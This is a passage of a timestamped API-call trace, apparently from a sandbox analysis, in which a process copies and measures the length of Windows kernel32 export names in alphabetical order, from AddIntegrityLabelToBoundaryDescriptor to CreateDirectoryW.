lstrlenA (lpString="ADDINTEGRITYLABELTOBOUNDARYDESCRIPTOR") returned 37 [0083.094] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="AddLocalAlternateComputerNameA" | out: lpString1="AddLocalAlternateComputerNameA") returned="AddLocalAlternateComputerNameA" [0083.094] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEA") returned 30 [0083.094] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="AddLocalAlternateComputerNameW" | out: lpString1="AddLocalAlternateComputerNameW") returned="AddLocalAlternateComputerNameW" [0083.094] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEW") returned 30 [0083.094] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="AddRefActCtx" | out: lpString1="AddRefActCtx") returned="AddRefActCtx" [0083.094] lstrlenA (lpString="ADDREFACTCTX") returned 12 [0083.094] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="AddSIDToBoundaryDescriptor" | out: lpString1="AddSIDToBoundaryDescriptor") returned="AddSIDToBoundaryDescriptor" [0083.095] lstrlenA (lpString="ADDSIDTOBOUNDARYDESCRIPTOR") returned 26 [0083.095] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="AddSecureMemoryCacheCallback" | out: lpString1="AddSecureMemoryCacheCallback") returned="AddSecureMemoryCacheCallback" [0083.095] lstrlenA (lpString="ADDSECUREMEMORYCACHECALLBACK") returned 28 [0083.095] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="AddVectoredContinueHandler" | out: lpString1="AddVectoredContinueHandler") returned="AddVectoredContinueHandler" [0083.095] lstrlenA (lpString="ADDVECTOREDCONTINUEHANDLER") returned 26 [0083.095] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="AddVectoredExceptionHandler" | out: lpString1="AddVectoredExceptionHandler") returned="AddVectoredExceptionHandler" [0083.095] lstrlenA (lpString="ADDVECTOREDEXCEPTIONHANDLER") returned 27 [0083.095] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="AdjustCalendarDate" | out: lpString1="AdjustCalendarDate") returned="AdjustCalendarDate" [0083.095] lstrlenA (lpString="ADJUSTCALENDARDATE") returned 18 [0083.095] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="AllocConsole" | out: lpString1="AllocConsole") returned="AllocConsole" [0083.095] lstrlenA (lpString="ALLOCCONSOLE") returned 12 [0083.095] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="AllocateUserPhysicalPages" | out: lpString1="AllocateUserPhysicalPages") returned="AllocateUserPhysicalPages" [0083.095] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGES") returned 25 [0083.095] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="AllocateUserPhysicalPagesNuma" | out: lpString1="AllocateUserPhysicalPagesNuma") returned="AllocateUserPhysicalPagesNuma" [0083.095] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGESNUMA") returned 29 [0083.095] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="ApplicationRecoveryFinished" | out: lpString1="ApplicationRecoveryFinished") returned="ApplicationRecoveryFinished" [0083.095] lstrlenA (lpString="APPLICATIONRECOVERYFINISHED") returned 27 [0083.095] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="ApplicationRecoveryInProgress" | out: lpString1="ApplicationRecoveryInProgress") returned="ApplicationRecoveryInProgress" [0083.095] lstrlenA (lpString="APPLICATIONRECOVERYINPROGRESS") returned 29 [0083.095] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="AreFileApisANSI" | out: lpString1="AreFileApisANSI") returned="AreFileApisANSI" [0083.095] lstrlenA (lpString="AREFILEAPISANSI") returned 15 [0083.095] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="AssignProcessToJobObject" | out: lpString1="AssignProcessToJobObject") returned="AssignProcessToJobObject" [0083.095] lstrlenA (lpString="ASSIGNPROCESSTOJOBOBJECT") returned 24 [0083.095] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="AttachConsole" | out: lpString1="AttachConsole") returned="AttachConsole" [0083.095] lstrlenA (lpString="ATTACHCONSOLE") returned 13 [0083.095] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BackupRead" | out: lpString1="BackupRead") returned="BackupRead" [0083.095] lstrlenA (lpString="BACKUPREAD") returned 10 [0083.095] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BackupSeek" | out: lpString1="BackupSeek") returned="BackupSeek" [0083.095] lstrlenA (lpString="BACKUPSEEK") returned 10 [0083.095] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BackupWrite" | out: lpString1="BackupWrite") returned="BackupWrite" [0083.095] lstrlenA (lpString="BACKUPWRITE") returned 11 [0083.095] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BaseCheckAppcompatCache" | out: lpString1="BaseCheckAppcompatCache") returned="BaseCheckAppcompatCache" [0083.095] lstrlenA (lpString="BASECHECKAPPCOMPATCACHE") returned 23 [0083.095] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BaseCheckAppcompatCacheEx" | out: lpString1="BaseCheckAppcompatCacheEx") returned="BaseCheckAppcompatCacheEx" [0083.095] lstrlenA (lpString="BASECHECKAPPCOMPATCACHEEX") returned 25 [0083.096] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BaseCheckRunApp" | out: lpString1="BaseCheckRunApp") returned="BaseCheckRunApp" [0083.096] lstrlenA (lpString="BASECHECKRUNAPP") returned 15 [0083.096] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BaseCleanupAppcompatCacheSupport" | out: lpString1="BaseCleanupAppcompatCacheSupport") returned="BaseCleanupAppcompatCacheSupport" [0083.096] lstrlenA (lpString="BASECLEANUPAPPCOMPATCACHESUPPORT") returned 32 [0083.096] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BaseDllReadWriteIniFile" | out: lpString1="BaseDllReadWriteIniFile") returned="BaseDllReadWriteIniFile" [0083.096] lstrlenA (lpString="BASEDLLREADWRITEINIFILE") returned 23 [0083.096] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BaseDumpAppcompatCache" | out: lpString1="BaseDumpAppcompatCache") returned="BaseDumpAppcompatCache" [0083.096] lstrlenA (lpString="BASEDUMPAPPCOMPATCACHE") returned 22 [0083.096] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BaseFlushAppcompatCache" | out: lpString1="BaseFlushAppcompatCache") returned="BaseFlushAppcompatCache" [0083.096] lstrlenA (lpString="BASEFLUSHAPPCOMPATCACHE") returned 23 [0083.096] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BaseFormatObjectAttributes" | out: lpString1="BaseFormatObjectAttributes") returned="BaseFormatObjectAttributes" [0083.096] lstrlenA (lpString="BASEFORMATOBJECTATTRIBUTES") returned 26 [0083.096] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BaseFormatTimeOut" | out: lpString1="BaseFormatTimeOut") returned="BaseFormatTimeOut" [0083.096] lstrlenA (lpString="BASEFORMATTIMEOUT") returned 17 [0083.096] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BaseGenerateAppCompatData" | out: lpString1="BaseGenerateAppCompatData") returned="BaseGenerateAppCompatData" [0083.096] lstrlenA (lpString="BASEGENERATEAPPCOMPATDATA") returned 25 [0083.096] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BaseGetNamedObjectDirectory" | out: lpString1="BaseGetNamedObjectDirectory") returned="BaseGetNamedObjectDirectory" [0083.096] lstrlenA (lpString="BASEGETNAMEDOBJECTDIRECTORY") returned 27 [0083.096] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BaseInitAppcompatCacheSupport" | out: lpString1="BaseInitAppcompatCacheSupport") returned="BaseInitAppcompatCacheSupport" [0083.096] lstrlenA (lpString="BASEINITAPPCOMPATCACHESUPPORT") returned 29 [0083.096] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BaseIsAppcompatInfrastructureDisabled" | out: lpString1="BaseIsAppcompatInfrastructureDisabled") returned="BaseIsAppcompatInfrastructureDisabled" [0083.096] lstrlenA (lpString="BASEISAPPCOMPATINFRASTRUCTUREDISABLED") returned 37 [0083.096] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BaseQueryModuleData" | out: lpString1="BaseQueryModuleData") returned="BaseQueryModuleData" [0083.096] lstrlenA (lpString="BASEQUERYMODULEDATA") returned 19 [0083.096] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BaseSetLastNTError" | out: lpString1="BaseSetLastNTError") returned="BaseSetLastNTError" [0083.096] lstrlenA (lpString="BASESETLASTNTERROR") returned 18 [0083.096] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BaseThreadInitThunk" | out: lpString1="BaseThreadInitThunk") returned="BaseThreadInitThunk" [0083.096] lstrlenA (lpString="BASETHREADINITTHUNK") returned 19 [0083.096] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BaseUpdateAppcompatCache" | out: lpString1="BaseUpdateAppcompatCache") returned="BaseUpdateAppcompatCache" [0083.096] lstrlenA (lpString="BASEUPDATEAPPCOMPATCACHE") returned 24 [0083.096] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BaseVerifyUnicodeString" | out: lpString1="BaseVerifyUnicodeString") returned="BaseVerifyUnicodeString" [0083.096] lstrlenA (lpString="BASEVERIFYUNICODESTRING") returned 23 [0083.096] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="Basep8BitStringToDynamicUnicodeString" | out: lpString1="Basep8BitStringToDynamicUnicodeString") returned="Basep8BitStringToDynamicUnicodeString" [0083.096] lstrlenA (lpString="BASEP8BITSTRINGTODYNAMICUNICODESTRING") returned 37 [0083.096] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BasepAllocateActivationContextActivationBlock" | out: lpString1="BasepAllocateActivationContextActivationBlock") returned="BasepAllocateActivationContextActivationBlock" [0083.096] lstrlenA (lpString="BASEPALLOCATEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 45 [0083.097] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BasepAnsiStringToDynamicUnicodeString" | out: lpString1="BasepAnsiStringToDynamicUnicodeString") returned="BasepAnsiStringToDynamicUnicodeString" [0083.097] lstrlenA (lpString="BASEPANSISTRINGTODYNAMICUNICODESTRING") returned 37 [0083.097] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BasepCheckAppCompat" | out: lpString1="BasepCheckAppCompat") returned="BasepCheckAppCompat" [0083.097] lstrlenA (lpString="BASEPCHECKAPPCOMPAT") returned 19 [0083.097] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BasepCheckBadapp" | out: lpString1="BasepCheckBadapp") returned="BasepCheckBadapp" [0083.097] lstrlenA (lpString="BASEPCHECKBADAPP") returned 16 [0083.097] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BasepCheckWinSaferRestrictions" | out: lpString1="BasepCheckWinSaferRestrictions") returned="BasepCheckWinSaferRestrictions" [0083.097] lstrlenA (lpString="BASEPCHECKWINSAFERRESTRICTIONS") returned 30 [0083.097] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BasepFreeActivationContextActivationBlock" | out: lpString1="BasepFreeActivationContextActivationBlock") returned="BasepFreeActivationContextActivationBlock" [0083.097] lstrlenA (lpString="BASEPFREEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 41 [0083.097] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BasepFreeAppCompatData" | out: lpString1="BasepFreeAppCompatData") returned="BasepFreeAppCompatData" [0083.097] lstrlenA (lpString="BASEPFREEAPPCOMPATDATA") returned 22 [0083.097] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BasepMapModuleHandle" | out: lpString1="BasepMapModuleHandle") returned="BasepMapModuleHandle" [0083.097] lstrlenA (lpString="BASEPMAPMODULEHANDLE") returned 20 [0083.097] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="Beep" | out: lpString1="Beep") returned="Beep" [0083.097] lstrlenA (lpString="BEEP") returned 4 [0083.097] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BeginUpdateResourceA" | out: lpString1="BeginUpdateResourceA") returned="BeginUpdateResourceA" [0083.097] lstrlenA (lpString="BEGINUPDATERESOURCEA") returned 20 [0083.097] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BeginUpdateResourceW" | out: lpString1="BeginUpdateResourceW") returned="BeginUpdateResourceW" [0083.097] lstrlenA (lpString="BEGINUPDATERESOURCEW") returned 20 [0083.097] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BindIoCompletionCallback" | out: lpString1="BindIoCompletionCallback") returned="BindIoCompletionCallback" [0083.097] lstrlenA (lpString="BINDIOCOMPLETIONCALLBACK") returned 24 [0083.097] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BuildCommDCBA" | out: lpString1="BuildCommDCBA") returned="BuildCommDCBA" [0083.097] lstrlenA (lpString="BUILDCOMMDCBA") returned 13 [0083.097] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BuildCommDCBAndTimeoutsA" | out: lpString1="BuildCommDCBAndTimeoutsA") returned="BuildCommDCBAndTimeoutsA" [0083.097] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSA") returned 24 [0083.097] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BuildCommDCBAndTimeoutsW" | out: lpString1="BuildCommDCBAndTimeoutsW") returned="BuildCommDCBAndTimeoutsW" [0083.097] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSW") returned 24 [0083.097] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BuildCommDCBW" | out: lpString1="BuildCommDCBW") returned="BuildCommDCBW" [0083.097] lstrlenA (lpString="BUILDCOMMDCBW") returned 13 [0083.097] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CallNamedPipeA" | out: lpString1="CallNamedPipeA") returned="CallNamedPipeA" [0083.098] lstrlenA (lpString="CALLNAMEDPIPEA") returned 14 [0083.098] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CallNamedPipeW" | out: lpString1="CallNamedPipeW") returned="CallNamedPipeW" [0083.098] lstrlenA (lpString="CALLNAMEDPIPEW") returned 14 [0083.098] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CallbackMayRunLong" | out: lpString1="CallbackMayRunLong") returned="CallbackMayRunLong" [0083.098] lstrlenA (lpString="CALLBACKMAYRUNLONG") returned 18 [0083.098] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CancelDeviceWakeupRequest" | out: lpString1="CancelDeviceWakeupRequest") returned="CancelDeviceWakeupRequest" [0083.098] lstrlenA (lpString="CANCELDEVICEWAKEUPREQUEST") returned 25 [0083.098] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CancelIo" | out: lpString1="CancelIo") returned="CancelIo" [0083.098] lstrlenA (lpString="CANCELIO") returned 8 [0083.098] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CancelIoEx" | out: lpString1="CancelIoEx") returned="CancelIoEx" [0083.098] lstrlenA (lpString="CANCELIOEX") returned 10 [0083.098] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CancelSynchronousIo" | out: lpString1="CancelSynchronousIo") returned="CancelSynchronousIo" [0083.098] lstrlenA (lpString="CANCELSYNCHRONOUSIO") returned 19 [0083.098] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CancelThreadpoolIo" | out: lpString1="CancelThreadpoolIo") returned="CancelThreadpoolIo" [0083.098] lstrlenA (lpString="CANCELTHREADPOOLIO") returned 18 [0083.098] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CancelTimerQueueTimer" | out: lpString1="CancelTimerQueueTimer") returned="CancelTimerQueueTimer" [0083.098] lstrlenA (lpString="CANCELTIMERQUEUETIMER") returned 21 [0083.098] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CancelWaitableTimer" | out: lpString1="CancelWaitableTimer") returned="CancelWaitableTimer" [0083.098] lstrlenA (lpString="CANCELWAITABLETIMER") returned 19 [0083.098] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="ChangeTimerQueueTimer" | out: lpString1="ChangeTimerQueueTimer") returned="ChangeTimerQueueTimer" [0083.098] lstrlenA (lpString="CHANGETIMERQUEUETIMER") returned 21 [0083.098] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CheckElevation" | out: lpString1="CheckElevation") returned="CheckElevation" [0083.098] lstrlenA (lpString="CHECKELEVATION") returned 14 [0083.098] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CheckElevationEnabled" | out: lpString1="CheckElevationEnabled") returned="CheckElevationEnabled" [0083.098] lstrlenA (lpString="CHECKELEVATIONENABLED") returned 21 [0083.098] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CheckForReadOnlyResource" | out: lpString1="CheckForReadOnlyResource") returned="CheckForReadOnlyResource" [0083.098] lstrlenA (lpString="CHECKFORREADONLYRESOURCE") returned 24 [0083.098] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CheckNameLegalDOS8Dot3A" | out: lpString1="CheckNameLegalDOS8Dot3A") returned="CheckNameLegalDOS8Dot3A" [0083.098] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3A") returned 23 [0083.098] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CheckNameLegalDOS8Dot3W" | out: lpString1="CheckNameLegalDOS8Dot3W") returned="CheckNameLegalDOS8Dot3W" [0083.098] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3W") returned 23 [0083.098] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CheckRemoteDebuggerPresent" | out: lpString1="CheckRemoteDebuggerPresent") returned="CheckRemoteDebuggerPresent" [0083.098] lstrlenA (lpString="CHECKREMOTEDEBUGGERPRESENT") returned 26 [0083.098] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="ClearCommBreak" | out: lpString1="ClearCommBreak") returned="ClearCommBreak" [0083.098] lstrlenA (lpString="CLEARCOMMBREAK") returned 14 [0083.098] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="ClearCommError" | out: lpString1="ClearCommError") returned="ClearCommError" [0083.099] lstrlenA (lpString="CLEARCOMMERROR") returned 14 [0083.099] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CloseConsoleHandle" | out: lpString1="CloseConsoleHandle") returned="CloseConsoleHandle" [0083.099] lstrlenA (lpString="CLOSECONSOLEHANDLE") returned 18 [0083.099] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CloseHandle" | out: lpString1="CloseHandle") returned="CloseHandle" [0083.099] lstrlenA (lpString="CLOSEHANDLE") returned 11 [0083.099] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="ClosePrivateNamespace" | out: lpString1="ClosePrivateNamespace") returned="ClosePrivateNamespace" [0083.099] lstrlenA (lpString="CLOSEPRIVATENAMESPACE") returned 21 [0083.099] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CloseProfileUserMapping" | out: lpString1="CloseProfileUserMapping") returned="CloseProfileUserMapping" [0083.099] lstrlenA (lpString="CLOSEPROFILEUSERMAPPING") returned 23 [0083.099] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CloseThreadpool" | out: lpString1="CloseThreadpool") returned="CloseThreadpool" [0083.099] lstrlenA (lpString="CLOSETHREADPOOL") returned 15 [0083.099] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CloseThreadpoolCleanupGroup" | out: lpString1="CloseThreadpoolCleanupGroup") returned="CloseThreadpoolCleanupGroup" [0083.099] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUP") returned 27 [0083.099] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CloseThreadpoolCleanupGroupMembers" | out: lpString1="CloseThreadpoolCleanupGroupMembers") returned="CloseThreadpoolCleanupGroupMembers" [0083.099] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUPMEMBERS") returned 34 [0083.099] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CloseThreadpoolIo" | out: lpString1="CloseThreadpoolIo") returned="CloseThreadpoolIo" [0083.099] lstrlenA (lpString="CLOSETHREADPOOLIO") returned 17 [0083.099] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CloseThreadpoolTimer" | out: lpString1="CloseThreadpoolTimer") returned="CloseThreadpoolTimer" [0083.099] lstrlenA (lpString="CLOSETHREADPOOLTIMER") returned 20 [0083.099] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CloseThreadpoolWait" | out: lpString1="CloseThreadpoolWait") returned="CloseThreadpoolWait" [0083.099] lstrlenA (lpString="CLOSETHREADPOOLWAIT") returned 19 [0083.099] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CloseThreadpoolWork" | out: lpString1="CloseThreadpoolWork") returned="CloseThreadpoolWork" [0083.099] lstrlenA (lpString="CLOSETHREADPOOLWORK") returned 19 [0083.099] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CmdBatNotification" | out: lpString1="CmdBatNotification") returned="CmdBatNotification" [0083.099] lstrlenA (lpString="CMDBATNOTIFICATION") returned 18 [0083.099] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CommConfigDialogA" | out: lpString1="CommConfigDialogA") returned="CommConfigDialogA" [0083.099] lstrlenA (lpString="COMMCONFIGDIALOGA") returned 17 [0083.099] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CommConfigDialogW" | out: lpString1="CommConfigDialogW") returned="CommConfigDialogW" [0083.099] lstrlenA (lpString="COMMCONFIGDIALOGW") returned 17 [0083.099] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CompareCalendarDates" | out: lpString1="CompareCalendarDates") returned="CompareCalendarDates" [0083.099] lstrlenA (lpString="COMPARECALENDARDATES") returned 20 [0083.099] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CompareFileTime" | out: lpString1="CompareFileTime") returned="CompareFileTime" [0083.099] lstrlenA (lpString="COMPAREFILETIME") returned 15 [0083.099] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CompareStringA" | out: lpString1="CompareStringA") returned="CompareStringA" [0083.099] lstrlenA (lpString="COMPARESTRINGA") returned 14 [0083.099] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CompareStringEx" | out: lpString1="CompareStringEx") returned="CompareStringEx" [0083.100] lstrlenA (lpString="COMPARESTRINGEX") returned 15 [0083.100] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CompareStringOrdinal" | out: lpString1="CompareStringOrdinal") returned="CompareStringOrdinal" [0083.100] lstrlenA (lpString="COMPARESTRINGORDINAL") returned 20 [0083.100] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CompareStringW" | out: lpString1="CompareStringW") returned="CompareStringW" [0083.100] lstrlenA (lpString="COMPARESTRINGW") returned 14 [0083.100] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="ConnectNamedPipe" | out: lpString1="ConnectNamedPipe") returned="ConnectNamedPipe" [0083.100] lstrlenA (lpString="CONNECTNAMEDPIPE") returned 16 [0083.100] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="ConsoleMenuControl" | out: lpString1="ConsoleMenuControl") returned="ConsoleMenuControl" [0083.100] lstrlenA (lpString="CONSOLEMENUCONTROL") returned 18 [0083.100] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="ContinueDebugEvent" | out: lpString1="ContinueDebugEvent") returned="ContinueDebugEvent" [0083.100] lstrlenA (lpString="CONTINUEDEBUGEVENT") returned 18 [0083.100] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="ConvertCalDateTimeToSystemTime" | out: lpString1="ConvertCalDateTimeToSystemTime") returned="ConvertCalDateTimeToSystemTime" [0083.100] lstrlenA (lpString="CONVERTCALDATETIMETOSYSTEMTIME") returned 30 [0083.100] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="ConvertDefaultLocale" | out: lpString1="ConvertDefaultLocale") returned="ConvertDefaultLocale" [0083.100] lstrlenA (lpString="CONVERTDEFAULTLOCALE") returned 20 [0083.100] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="ConvertFiberToThread" | out: lpString1="ConvertFiberToThread") returned="ConvertFiberToThread" [0083.100] lstrlenA (lpString="CONVERTFIBERTOTHREAD") returned 20 [0083.100] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="ConvertNLSDayOfWeekToWin32DayOfWeek" | out: lpString1="ConvertNLSDayOfWeekToWin32DayOfWeek") returned="ConvertNLSDayOfWeekToWin32DayOfWeek" [0083.100] lstrlenA (lpString="CONVERTNLSDAYOFWEEKTOWIN32DAYOFWEEK") returned 35 [0083.100] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="ConvertSystemTimeToCalDateTime" | out: lpString1="ConvertSystemTimeToCalDateTime") returned="ConvertSystemTimeToCalDateTime" [0083.100] lstrlenA (lpString="CONVERTSYSTEMTIMETOCALDATETIME") returned 30 [0083.100] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="ConvertThreadToFiber" | out: lpString1="ConvertThreadToFiber") returned="ConvertThreadToFiber" [0083.100] lstrlenA (lpString="CONVERTTHREADTOFIBER") returned 20 [0083.100] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="ConvertThreadToFiberEx" | out: lpString1="ConvertThreadToFiberEx") returned="ConvertThreadToFiberEx" [0083.100] lstrlenA (lpString="CONVERTTHREADTOFIBEREX") returned 22 [0083.100] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CopyContext" | out: lpString1="CopyContext") returned="CopyContext" [0083.100] lstrlenA (lpString="COPYCONTEXT") returned 11 [0083.100] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CopyFileA" | out: lpString1="CopyFileA") returned="CopyFileA" [0083.100] lstrlenA (lpString="COPYFILEA") returned 9 [0083.100] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CopyFileExA" | out: lpString1="CopyFileExA") returned="CopyFileExA" [0083.100] lstrlenA (lpString="COPYFILEEXA") returned 11 [0083.100] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CopyFileExW" | out: lpString1="CopyFileExW") returned="CopyFileExW" [0083.100] lstrlenA (lpString="COPYFILEEXW") returned 11 [0083.100] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CopyFileTransactedA" | out: lpString1="CopyFileTransactedA") returned="CopyFileTransactedA" [0083.100] lstrlenA (lpString="COPYFILETRANSACTEDA") returned 19 [0083.100] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CopyFileTransactedW" | out: lpString1="CopyFileTransactedW") returned="CopyFileTransactedW" [0083.101] lstrlenA (lpString="COPYFILETRANSACTEDW") returned 19 [0083.101] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CopyFileW" | out: lpString1="CopyFileW") returned="CopyFileW" [0083.101] lstrlenA (lpString="COPYFILEW") returned 9 [0083.101] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CopyLZFile" | out: lpString1="CopyLZFile") returned="CopyLZFile" [0083.101] lstrlenA (lpString="COPYLZFILE") returned 10 [0083.101] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateActCtxA" | out: lpString1="CreateActCtxA") returned="CreateActCtxA" [0083.101] lstrlenA (lpString="CREATEACTCTXA") returned 13 [0083.101] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateActCtxW" | out: lpString1="CreateActCtxW") returned="CreateActCtxW" [0083.101] lstrlenA (lpString="CREATEACTCTXW") returned 13 [0083.101] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateBoundaryDescriptorA" | out: lpString1="CreateBoundaryDescriptorA") returned="CreateBoundaryDescriptorA" [0083.101] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORA") returned 25 [0083.101] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateBoundaryDescriptorW" | out: lpString1="CreateBoundaryDescriptorW") returned="CreateBoundaryDescriptorW" [0083.101] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORW") returned 25 [0083.101] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateConsoleScreenBuffer" | out: lpString1="CreateConsoleScreenBuffer") returned="CreateConsoleScreenBuffer" [0083.101] lstrlenA (lpString="CREATECONSOLESCREENBUFFER") returned 25 [0083.101] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateDirectoryA" | out: lpString1="CreateDirectoryA") returned="CreateDirectoryA" [0083.101] lstrlenA (lpString="CREATEDIRECTORYA") returned 16 [0083.101] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateDirectoryExA" | out: lpString1="CreateDirectoryExA") returned="CreateDirectoryExA" [0083.101] lstrlenA (lpString="CREATEDIRECTORYEXA") returned 18 [0083.101] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateDirectoryExW" | out: lpString1="CreateDirectoryExW") returned="CreateDirectoryExW" [0083.101] lstrlenA (lpString="CREATEDIRECTORYEXW") returned 18 [0083.101] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateDirectoryTransactedA" | out: lpString1="CreateDirectoryTransactedA") returned="CreateDirectoryTransactedA" [0083.101] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDA") returned 26 [0083.101] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateDirectoryTransactedW" | out: lpString1="CreateDirectoryTransactedW") returned="CreateDirectoryTransactedW" [0083.101] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDW") returned 26 [0083.101] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateDirectoryW" | out: lpString1="CreateDirectoryW") returned="CreateDirectoryW" [0083.101] lstrlenA (lpString="CREATEDIRECTORYW") returned 16 [0083.101] lstrcpyA (in: lpString1=0x3f2cf70, 